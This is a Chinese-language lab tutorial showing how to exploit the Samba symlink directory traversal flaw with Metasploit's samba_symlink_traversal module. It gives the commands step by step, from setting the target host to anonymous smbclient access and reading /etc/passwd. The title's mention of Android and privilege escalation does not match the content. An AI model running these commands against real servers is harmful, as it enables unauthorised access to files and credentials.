android4.0漏洞msf,Metasploit溢出samba提权漏洞

Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。

一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

e2644b587aaa144baabd81d0116a7b1f.png

1.3在终端中输入命令“msfconsole”,启动MSF终端。

1.4在终端中输入命令“search samba”,搜索samba的相关工具和***载荷。

1.5在终端中输入命令“use auxiliary/admin/smb/samba_symlink_traversal”,启用漏洞利用模块, 提示符就会提示进入到该路径下。

497ae7fda01c6a8b0bff027dfa5f9964.png

1.6在终端中输入命令“info”,查看需要设置的相关项,“yes”表示必须填写的参数。

dd211f09fdcec7f548e7be12eda8922b.png

1.7在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。

1.8在终端中输入“set SMBSHARE tmp”, 设置SAM可写文件。

1.9在终端中输入“exploit”, 开始***。

1.10新打开一个终端,输入“smbclient //192.168.1.3/tmp”,直接回车,不用输入密码。

f7325cdd8123d0186af38b42876d8f39.png

1.11在终端中输入“cd rootfs”, 进入rootfs目录,在终端下输入命令“ls”,列出目录。

1.12在终端中输入“more /etc/passwd”, 查看目标主机系统中的密码。

99e3c820286032e84e8c92d4d8f84cd1.png

db3e3f84cfe36d24d9d91e0203dc5f9c.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值